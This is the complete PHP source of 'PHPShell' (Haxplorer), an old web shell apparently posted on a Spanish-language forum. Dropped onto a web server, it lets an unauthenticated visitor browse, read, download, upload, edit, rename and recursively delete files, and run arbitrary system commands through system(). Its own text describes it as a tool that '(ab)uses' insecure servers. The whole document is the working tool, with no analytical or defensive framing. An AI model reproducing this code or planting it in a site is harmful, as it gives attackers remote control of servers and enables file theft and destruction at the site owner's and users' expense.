<?php
error_reporting(0);
$PHPVer=phpversion();
$isGoodver=(intval($PHPVer[0])>=4);
$scriptTitle = "PHPShell";
$scriptident = "$scriptTitle by Macker";
if (empty($Pmax))
$Pmax = 50; /* Identifies the max amount of Directories and files listed on one page */
if (empty($Pidx))
$Pidx = 0;
$dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
$scriptdate = "15-07-2002";
$scriptver = "Version 2.5.3dev";
$LOCAL_IMAGE_DIR = "img";
$REMOTE_IMAGE_URL = "img";
$SFileName="phpshell.php";
$img = array(
"Edit"
=> "edit.JPG",
"Download"
=> "download.JPG",
"Upload"
=> "upload.JPG",
"Delete"
=> "delete.JPG",
"View"
=> "view.JPG",
"Rename"
=> "rename.JPG",
"Move"
=> "move.JPG",
"Copy"
=> "copy.JPG",
"Execute"
=> "exec.JPG"
);
while (list($id, $im)=each($img))
if (file_exists("$LOCAL_IMAGE_DIR/$im"))
$img[$id] = "<img height=\"16\" width=\"16\" border=\"0\" src=\"$REMOTE_IMAGE_URL/$im\" alt=\"$id\">";
else
$img[$id] = "[$id]";
/* <!-- A few handy functions --> */
function spacetonbsp($instr) { return str_replace(" ", " ", $instr); }
function Mydeldir($Fdir) {
if (is_dir($Fdir)) {
$Fh=@opendir($Fdir);
while ($Fbuf = readdir($Fh))
if (($Fbuf != ".") && ($Fbuf != ".."))
Mydeldir("$Fdir/$Fbuf");
@closedir($Fh);
return rmdir($Fdir);
}
else {
return unlink($Fdir);
}
}
function formatsize($insize) {
$size = $insize;
$add = "B";
if ($size > 1024) {
$size = intval(intval($size) / 1.024)/1000;
$add = "KB";
}
if ($size > 1024) {
$size = intval(intval($size) / 1.024)/1000;
$add = "MB";
}
if ($size > 1024) {
$size = intval(intval($size) / 1.024)/1000;
$add = "GB";
}
if ($size > 1024) {
$size = intval(intval($size) / 1.024)/1000;
$add = "TB";
}
return "$size $add";
}
if ($cmd != "downl") {
?>
<!-- <?php echo $scriptident ?>, <?php echo $scriptver ?>, <?php echo $scriptdate ?> -->
<HTML>
<HEAD>
<STYLE>
<!--
A{ text-decoration:none; color:navy; font-size: 12px }
body { font-size: 12px; }
Table { font-size: 12px; }
TR{ font-size: 12px; }
TD{ font-size: 12px; BORDER-LEFT: black 0px solid; BORDER-RIGHT: black 0px solid; BORDER-TOP: black 0px solid; BORDER-BOTTOM: black 0px solid; COLOR: black; }
.border{ BORDER-LEFT: black 1px solid;
BORDER-RIGHT: black 1px solid;
BORDER-TOP: black 1px solid;
BORDER-BOTTOM: black 1px solid;
}
.none { BORDER-LEFT: black 0px solid;
BORDER-RIGHT: black 0px solid;
BORDER-TOP: black 0px solid;
BORDER-BOTTOM: black 0px solid;
}
.top { BORDER-TOP: black 1px solid; }
.textin { BORDER-LEFT: silver 1px solid;
BORDER-RIGHT: silver 1px solid;
BORDER-TOP: silver 1px solid;
BORDER-BOTTOM: silver 1px solid;
width: 99%; font-size: 12px; font-weight: bold; color: navy;
}
.notop { BORDER-TOP: black 0px solid; }
.bottom { BORDER-BOTTOM: black 1px solid; }
.nobottom { BORDER-BOTTOM: black 0px solid; }
.left { BORDER-LEFT: black 1px solid; }
.noleft { BORDER-LEFT: black 0px solid; }
.right { BORDER-RIGHT: black 1px solid; }
.noright { BORDER-RIGHT: black 0px solid; }
.silver{ BACKGROUND: silver; }
-->
</STYLE>
<TITLE><?php echo $SFileName ?></TITLE>
</HEAD>
<body topmargin="0" leftmargin="0">
<table width=100% NOWRAP border="0">
<tr NOWRAP>
<td width="100%" NOWRAP>
<table NOWRAP width=100% border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="100%" class="silver border">
<center>
<strong>
<font size=3><?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?></font>
</strong>
</center>
</td>
</tr>
</table><br>
<?php
}
if ( $cmd=="dir" ) {
$h=@opendir($dir);
if ($h == false) {
echo "<br><font color=\"red\"> \n\n\n\n
COULD NOT OPEN THIS DIRECTORY!!!<br> \n
THE SCRIPT WILL RESULT IN AN ERROR!!!
<br><br> \n
PLEASE MAKE SURE YOU'VE GOT READ PERMISSIONS TO THE DIR...
<br><br></font>\n\n\n\n";
}
if (function_exists('realpath')) {
$partdir = realpath($dir);
}
else {
$partdir = $dir;
}
if (strlen($partdir) >= 100) {
$partdir = substr($partdir, -100);
$pos = strpos($partdir, "/");
if (strval($pos) != "") {
$partdir = "<-- ...".substr($partdir, $pos);
}
$partdir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $partdir )));
$dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
}
?>
<form name="urlform" action="<?php echo $SFileName ?>"><input type="hidden" name="cmd" value="dir">
<table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="100%" class="silver border">
<center> HAXPLORER - Server Files Browser... </center>
</td>
</tr>
</table>
<br>
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td class="border nobottom noright">
Browsing:
</td>
<td width="100%" class="border nobottom noleft">
<table width="100%" border="0" cellpadding="1" cellspacing="0">
<tr>
<td NOWRAP width="99%" align="center"><input type="text" name="dir" class="none textin" value="<?php echo $partdir ?>"></td>
<td NOWRAP><center> <a href="javascript: urlform.submit();"><b>GO<b></a> <center></td>
</tr>
</table>
</td>
</tr>
</table>
<!-- </form> -->
<table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0" >
<tr>
<td width="100%" NOWRAP class="silver border">
Filename
</td>
<td NOWRAP class="silver border noleft">
Actions (Attempt to perform)
</td>
<td NOWRAP class="silver border noleft">
Size
</td>
<td width=1 NOWRAP class="silver border noleft">
Attributes
</td>
<td NOWRAP class="silver border noleft">
Modification Date
</td>
<tr>
<?php
/* <!-- This whole heap of junk is the sorting section... */
$dirn
= array();
$filen
= array();
$filesizes
= 0;
while ($buf = readdir($h)) {
if (is_dir("$dir/$buf"))
$dirn[] = $buf;
else {
$size = @filesize("$dir/$buf");
If ($size != false) {
$filesizes = $filesizes + $size;
}
$filen[] = $buf;
}
}
$dirno
= count($dirn) + 1;
$fileno
= count($filen) + 1;
function mycmp($a, $b){
if ($a == $b) return 0;
return (strtolower($a) < strtolower($b)) ? -1 : 1;
}
if (function_exists("usort")) {
usort($dirn, "mycmp");
usort($filen, "mycmp");
}
else {
sort ($dirn);
sort ($filen);
}
reset ($dirn);
reset ($filen);
if (function_exists('array_merge')) {
$filelist = array_merge ($dirn, $filen);
}
else {
$filelist = $dirn + $filen;
}
if ( count($filelist)-1 > $Pmax ) {
$from = $Pidx * $Pmax;
$to = ($Pidx + 1) * $Pmax-1;
if ($to - count($filelist) - 1 + ($Pmax / 2) > 0 )
$to = count($filelist) - 1;
if ($to > count($filelist)-1)
$to = count($filelist)-1;
$Dcontents = array();
For ($Fi = $from; $Fi <= $to; $Fi++) {
$Dcontents[] = $filelist[$Fi];
}
}
else {
$Dcontents = $filelist;
}
while (list ($key, $file) = each ($Dcontents)) {
if (is_dir("$dir/$file")) { /* <!-- If it's a Directory --> */
/* <!-- Dirname --> */
echo "<tr><td NOWRAP class=\"top left right\"> <a href=\"$SFileName?cmd=dir&dir=$dir/$file\">[$file]</a> </td>\n";
/* <!-- Actions --> */
echo "<td NOWRAP class=\"top right\"><center> \n";
/* <!-- Rename --> */
if ( ($file != ".") && ($file != "..") )
echo "<a href=\"$SFileName?cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file\">".$img["Rename"]."</a> \n";
/* <!-- Delete --> */
if ( ($file != ".") && ($file != "..") )
echo " <a href=\"$SFileName?cmd=deldir&file=$dir/$file&lastcmd=dir&lastdir=$dir\">".$img["Delete"]."</a>\n";
/* <!-- End of Actions --> */
echo " </center></td>\n";
/* <!-- Size --> */
echo "<td NOWRAP class=\"top right\"> </td>\n";
/* <!-- Attributes --> */
echo "<td NOWRAP class=\"top right\"> \n";
echo "<strong>D</strong>";
if ( @is_readable("$dir/$file") ) {
echo "<strong>R</strong>";
}
if (function_exists('is_writeable')) {
if ( @is_writeable("$dir/$file") ) {
echo "<strong>W</stong>";
}
}
else {
echo "<strong>(W)</stong>";
}
if ( @is_executable("$dir/$file") ) {
echo "<Strong>X<strong>";
}
echo " </td>\n";
/* <!-- Date --> */
echo "<td NOWRAP class=\"top right\" NOWRAP>\n";
echo " ".date("D d-m-Y H:i:s", filemtime("$dir/$file"))." ";
echo "</td>";
echo "</tr>\n";
}
else { /* <!-- Then it must be a File... --> */
/* <!-- Filename --> */
if ( @is_readable("$dir/$file") )
echo "<tr><td NOWRAP class=\"top left right\"> <a href=\"$SFileName?cmd=file&file=$dir/$file\">$file</a> </td>\n";
else
echo "<tr><td NOWRAP class=\"top left right\"> $file </td>\n";
/* <!-- Actions --> */
echo "<td NOWRAP class=\"top right\"><center> \n";
/* <!-- Rename --> */
echo "<a href=\"$SFileName?cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file\">".$img["Rename"]."</a> \n";
/* <!-- Edit --> */
if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
echo "<a href=\"$SFileName?cmd=edit&file=$dir/$file\">".$img["Edit"]."</a> \n";
/* <!-- Copy --> */
echo "<a href=\"$SFileName?cmd=copy&file=$dir/$file\">".$img["Copy"]."</a>\n";
/* <!-- Move --> */
if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
echo " <a href=\"$SFileName?cmd=move&file=$dir/$file\">".$img["Move"]."</a>\n";
/* <!-- Delete --> */
echo " <a href=\"$SFileName?cmd=delfile&file=$dir/$file&lastcmd=dir&lastdir=$dir\">".$img["Delete"]."</a>\n";
/* <!-- Download --> */
echo " <a href=\"$SFileName?cmd=downl&file=$dir/$file\">".$img["Download"]."</a>\n";
/* <!-- Execute --> */
if ( @is_executable("$dir/$file") )
echo " <a href=\"$SFileName?cmd=execute&file=$dir/$file\">".$img["Execute"]."</a>\n";
/* <!-- End of Actions --> */
echo " </center></td>\n";
/* <!-- Size --> */
echo "<td NOWRAP align=\"right\" class=\"top right\" NOWRAP >\n";
$size = @filesize("$dir/$file");
If ($size != false)
echo " <strong>".formatsize($size)."<strong>";
else
echo " <strong>0 B<strong>";
echo " </td>\n";
/* <!-- Attributes --> */
echo "<td NOWRAP class=\"top right\"> \n";
if ( @is_readable("$dir/$file") )
echo "<strong>R</strong>";
if ( @is_writeable("$dir/$file") )
echo "<strong>W</stong>";
if ( @is_executable("$dir/$file") )
echo "<Strong>X<strong>";
if (function_exists('is_uploaded_file')){
if ( @is_uploaded_file("$dir/$file") )
echo "<Strong>U<strong>";
}
else {
echo "<Strong>(U)<strong>";
}
echo " </td>\n";
/* <!-- Date --> */
echo "<td NOWRAP class=\"top right\" NOWRAP>\n";
echo " ".date("D d-m-Y H:i:s", filemtime("$dir/$file"))." ";
echo "</td>";
echo "</tr>\n";
}
}
echo "</table><table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr>\n<td NOWRAP width=100% class=\"silver border noright\">\n";
echo " ".@count ($dirn)." Dir(s), ".@count ($filen)." File(s) \n";
echo "</td><td NOWRAP class=\"silver border noleft\">\n";
echo " Total filesize: ".formatsize($filesizes)." <td></tr>\n";
function printpagelink($a, $b, $link = ""){
if ($link != "")
echo "<A HREF=\"$link\"><b>| $a - $b |</b></A>";
else
echo "<b>| $a - $b |</b>";
}
if ( count($filelist)-1 > $Pmax ) {
echo "<tr><td colspan=\"2\" class=\"silver border notop\"><table width=\"100%\" cellspacing=\"0\" cellpadding=\"3\"><tr><td valign=\"top\"><font color=\"red\"><b>Page:</b></font></td><td width=\"100%\"><center>";
$Fi = 0;
while ( ( (($Fi+1)*$Pmax) + ($Pmax/2) ) < count($filelist)-1 ) {
$from = $Fi*$Pmax;
while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++;
$to = ($Fi + 1) * $Pmax - 1;
if ($Fi == $Pidx)
$link="";
else
$link="$SFilename?cmd=$cmd&dir=$dir&Pidx=$Fi";
printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);
echo " ";
$Fi++;
}
$from = $Fi*$Pmax;
while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++;
$to = count($filelist)-1;
if ($Fi == $Pidx)
$link="";
else
$link="$SFilename?cmd=$cmd&dir=$dir&Pidx=$Fi";
printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);
echo "</center></td></tr></table></td></tr>";
}
echo "</table>\n<br><table NOWRAP>";
if ($isGoodver) {
echo "<tr><td class=\"silver border\"> <strong>Server's PHP Version: </strong> </td><td> $PHPVer </td></tr>\n";
}
else {
echo "<tr><td class=\"silver border\"> <strong>Server's PHP Version: </strong> </td><td> $PHPVer (Some functions might be unavailable...) </td></tr>\n";
}
/* <!-- Other Actions --> */
echo "<tr><td class=\"silver border\"> <strong>Other actions: </strong> </td>\n";
echo "<td> <b><a href=\"$SFileName?cmd=newfile&lastcmd=dir&lastdir=$dir\">| New File |</a>\n <a href=\"$SFileName?cmd=newdir&lastcmd=dir&lastdir=$dir\">| New Directory |</a>\n <a href=\"$SFileName?cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir\">| Upload a File |</a></b>\n</td></tr>\n";
echo "<tr><td class=\"silver border\"> <strong>Script Location: </strong> </td><td> $PATH_TRANSLATED</td></tr>\n";
echo "<tr><td class=\"silver border\"> <strong>Your IP: </strong> </td><td> $REMOTE_ADDR </td></tr>\n";
echo "<tr><td class=\"silver border\"> <strong>Browsing Directory: </strong></td><td> $partdir </td></tr>\n";
echo "<tr><td valign=\"top\" class=\"silver border\"> <strong>Legend: </strong </td><td>\n";
echo "<table NOWRAP>";
echo "<tr><td><strong>D:</strong></td><td> Directory.</td></tr>\n";
echo "<tr><td><strong>R:</strong></td><td> Readable.</td></tr>\n";
echo "<tr><td><strong>W:</strong></td><td> Writeable.</td></tr>\n";
echo "<tr><td><strong>X:</strong></td><td> Executable.</td></tr>\n";
echo "<tr><td><strong>U:</strong></td><td> HTTP Uploaded File.</td></tr>\n";
echo "</table></td>";
echo "</table>";
echo "<br>";
@closedir($h);
}
elseif ( $cmd=="execute" ) {/*<!-- Execute the executable -->*/
echo system("$file");
}
elseif ( $cmd=="deldir" ) { /*<!-- Delete a directory and all it's files --> */
echo "<center><table><tr><td NOWRAP>" ;
if ($auth == "yes") {
if (Mydeldir($file)==false) {
echo "Could not remove \"$file\"<br>Permission denied, or directory not empty...";
}
else {
echo "Successfully removed \"$file\"<br>";
}
echo "<form action=\"$SFileName\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form>";
}
else {
echo "Are you sure you want to delete \"$file\" and all it's subdirectories ?
<form action=\"$SFileName\" method=\"POST\">
<input type=\"hidden\" name=\"cmd\" value=\"deldir\">
<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
<input type=\"hidden\" name=\"file\" value=\"$file\">
<input type=\"hidden\" name=\"auth\" value=\"yes\">
<input type=\"submit\" value=\"Yes\"></form>
<form action=\"$SFileName\" method=\"POST\">
<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
<input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
}
echo "</td></tr></center>";
}
elseif ( $cmd=="delfile" ) { /*<!-- Delete a file --> */
echo "<center><table><tr><td NOWRAP>" ;
if ($auth == "yes") {
if (@unlink($file)==false) {
echo "Could not remove \"$file\"<br>";
}
else {
echo "Successfully removed \"$file\"<br>";
}
echo "<form action=\"$SFileName\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form>";
}
else {
echo "Are you sure you want to delete \"$file\" ?
<form action=\"$SFileName\" method=\"POST\">
<input type=\"hidden\" name=\"cmd\" value=\"delfile\">
<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
<input type=\"hidden\" name=\"file\" value=\"$file\">
<input type=\"hidden\" name=\"auth\" value=\"yes\">
<input type=\"submit\" value=\"Yes\"></form>
<form action=\"$SFileName\" method=\"POST\">
<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
<input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
}
echo "</td></tr></center>";
}
elseif ( $cmd=="newfile" ) { /*<!-- Create new file with default name --> */
echo "<center><table><tr><td NOWRAP>";
$i = 1;
while (file_exists("$lastdir/newfile$i.txt"))
$i++;
$file = fopen("$lastdir/newfile$i.txt", "w+");
if ($file == false)
echo "Could not create the new file...<br>";
else
echo "Successfully created: \"$lastdir/newfile$i.txt\"<br>";
echo "
<form action=\"$SFileName\" method=\"POST\">
<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
<input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\">
</form></center>
</td></tr></table></center>
";
}
elseif ( $cmd=="newdir" ) { /*<!-- Create new directory with default name --> */
echo "<center><table><tr><td NOWRAP>" ;
$i = 1;
while (is_dir("$lastdir/newdir$i"))
$i++;
$file = mkdir("$lastdir/newdir$i", 0777);
if ($file == false)
echo "Could not create the new directory...<br>";
else
echo "Successfully created: \"$lastdir/newdir$i\"<br>";
echo "<form action=\"$SFileName\" method=\"POST\">
<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
<input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\">
</form></center></td></tr></table></center>";
}
elseif ( $cmd=="edit" ) { /*<!-- Edit a file and save it afterwards with the saveedit block. --> */
$contents = "";
$fc = @file( $file );
while ( @list( $ln, $line ) = each( $fc ) ) {
$contents .= htmlentities( $line ) ;
}
echo "<br><center><table><tr><td NOWRAP>";
echo "<form action=\"$SFileName\" method=\"post\">\n";
echo "<input type=\"hidden\" name=\"cmd\" value=\"saveedit\">\n";
echo "<strong>EDIT FILE: </strong>$file<br>\n";
echo "<textarea rows=\"25\" cols=\"95\" name=\"contents\">$contents</textarea><br>\n";
echo "<input size=\"50\" type=\"text\" name=\"file\" value=\"$file\">\n";
echo "<input type=\"submit\" value=\"Save\">";
echo "</form>";
echo "</td></tr></table></center>";
}
elseif ( $cmd=="saveedit" ) { /*<!-- Save the edited file back to a file --> */
$fo = fopen($file, "w");
$wrret = fwrite($fo, stripslashes($contents));
$clret = fclose($fo);
}
elseif ( $cmd=="downl" ) { /*<!-- Save the edited file back to a file --> */
$downloadfile = urldecode($file);
if (function_exists("basename"))
$downloadto = basename ($downloadfile);
else
$downloadto = "download.ext";
if (!file_exists("$downloadfile"))
echo "The file does not exist";
else {
$size = @filesize("$downloadfile");
if ($size != false) {
$add="; size=$size";
}
else {
$add="";
}
header("Content-Type: application/download");
header("Content-Disposition: attachment; filename=$downloadto$add");
$fp=fopen("$downloadfile" ,"rb");
fpassthru($fp);
flush();
}
}
elseif ( $cmd=="upload" ) { /* <!-- Upload File form --> */
?>
<center>
<table>
<tr>
<td NOWRAP>
Welcome to the upload section...
Please note that the destination file will be
<br> overwritten if it already exists!!!<br><br>
<form enctype="multipart/form-data" action="<?php echo $SFileName ?>" method="post">
<input type="hidden" name="MAX_FILE_SIZE" value="1099511627776">
<input type="hidden" name="cmd" value="uploadproc">
<input type="hidden" name="dir" value="<?php echo $dir ?>">
<input type="hidden" name="lastcmd" value="<?php echo $lastcmd ?>">
<input type="hidden" name="lastdir" value="<?php echo $lastdir ?>">
Select local file:<br>
<input size="75" name="userfile" type="file"><br>
<input type="submit" value="Send File">
</form>
<br>
<form action="<?php echo $SFileName ?>" method="POST">
<input type="hidden" name="cmd" value="<?php echo $lastcmd ?>">
<input type="hidden" name="dir" value="<?php echo $lastdir ?>">
<input tabindex="0" type="submit" value="Cancel">
</form>
</td>
</tr>
</table>
</center>
<?php
}
elseif ( $cmd=="uploadproc" ) { /* <!-- Process Uploaded file --> */
echo "<center><table><tr><td NOWRAP>";
if (file_exists($userfile))
$res = copy($userfile, "$dir/$userfile_name");
echo "Uploaded \"$userfile_name\" to \"$userfile\"; <br>\n";
if ($res) {
echo "Successfully moved \"$userfile\" to \"$dir/$userfile_name\".\n<br><br>";
echo "Local filename: \"$userfile_name\".\n<br>Remote filename: \"$userfile\".\n<br>";
echo "Filesize: ".formatsize($userfile_size).".\n<br>Filetype: $userfile_type.\n<br>";
}
else {
echo "Could not move uploaded file; Action aborted...";
}
echo "<form action=\"$SFileName\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form></center>" ;
echo "<br><br></td></tr></table></center>";
}
elseif ( $cmd=="file" ) { /* <!-- View a file in text --> */
$fc = @file( $file );
while ( @list( $ln, $line ) = each( $fc ) ) {
echo spacetonbsp(@htmlentities($line))."<br>\n";
}
}
elseif ( $cmd=="ren" ) { /* <!-- File and Directory Rename --> */
if (function_exists('is_dir')) {
if (is_dir("$oldfile")) {
$objname = "Directory";
$objident = "Directory";
}
else {
$objname = "Filename";
$objident = "file";
}
}
echo "<table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td width=100% style=\"class=\"silver border\"><center> Rename a file: </center></td></tr></table><br>\n";
If (empty($newfile) != true) {
echo "<center>";
$return = @rename($oldfile, "$olddir$newfile");
if ($return) {
echo "$objident renamed successfully:<br><br>Old $objname: \"$oldfile\".<br>New $objname: \"$olddir$newfile\"";
}
else {
if ( @file_exists("$olddir$newfile") ) {
echo "Error: The $objident does already exist...<br><br>\"$olddir$newfile\"<br><br>Hit your browser's back to try again...";
}
else {
echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it.";
}
}
echo "<form action=\"$SFileName\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form></center>" ;
}
else {
$dpos = strrpos($oldfile, "/");
if (strval($dpos)!="") {
$olddir = substr($oldfile, 0, $dpos+1);
}
else {
$olddir = "$lastdir/";
}
$fpos = strrpos($oldfile, "/");
if (strval($fpos)!="") {
$inputfile = substr($oldfile, $fpos+1);
}
else {
$inputfile = "";
}
echo "<center><table><tr><td><form action=\"$SFileName\" method=\"post\">\n";
echo "<input type=\"hidden\" name=\"cmd\" value=\"ren\">\n";
echo "<input type=\"hidden\" name=\"oldfile\" value=\"$oldfile\">\n";
echo "<input type=\"hidden\" name=\"olddir\" value=\"$olddir\">\n";
echo "<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">\n";
echo "<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">\n";
echo "Rename \"$oldfile\" to:<br>\n";
echo "<input size=\"100\" type=\"text\" name=\"newfile\" value=\"$inputfile\"><br><input type=\"submit\" value=\"Rename\">";
echo "</form><form action=\"$SFileName\" method=\"post\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input type=\"submit\" value=\"Cancel\"></form>";
echo "</td></tr></table></center>";
}
}
else { /* <!-- There is a incorrect or no parameter specified... Let's open the main menu --> */
$isMainMenu = true;
?>
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="100%" class="border">
<center> -<[{ <?php echo $scriptTitle ?> Main Menu }]>- </center>
</td>
</tr>
</table>
<br>
<center>
<table border="0" NOWRAP>
<tr>
<td valign="top" class="silver border">
<a href="<?php echo $SFileName ?>?cmd=dir&dir=."> <font color="navy"><strong>==> Haxplorer <==</strong></font> </a>
</td>
<td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP>
Haxplorer is a server side file browser wich (ab)uses the directory object to list
the files and directories stored on a webserver. This handy tools allows you to manage
files and directories on a unsecure server with php support.<br><br>This entire script
is coded for unsecure servers, if your server is secured the script will hide commands
or will even return errors to your browser...<br><br>
</td>
</tr>
<!--
<tr>
<td valign="top" class="silver border">
<a href="<?php echo $SFileName ?>?cmd=con"> <font color="navy"><strong>Ro0t C0ns0le</strong></font> </a>
</td>
<td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP>
--OUT OF ORDER--<br>Ro0t C0ns0le is just a little function that allows you to perform system
commands on the webserver. If you're using a linux server, system commands such as ls and
shred will be available for you... <br><br>This function also depends on an unsecure server
with php support.<br><br>
</td>
</tr>
-->
</table>
</center>
<br>
<?php
}
if ($cmd != "downl") {
if ( $isMainMenu != true) {
?>
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="100%" style="class="silver border">
<center><strong>
<a href="<?php echo $SFileName ?>"><font color="navy">[ Main Menu ]</font></a>
<a href="<?php echo $SFileName ?>?cmd=dir&dir=."><font color="navy">[ Haxplorer ]</font></a>
</strong></center>
</td>
</tr>
</table>
<br>
<?php
}
?>
<table width=100% border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="100%" class="silver border">
<center> <?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?> </center>
</td>
</tr>
</table>
</td>
</tr>
</table>
<?php
}
?>
Autor
En línea
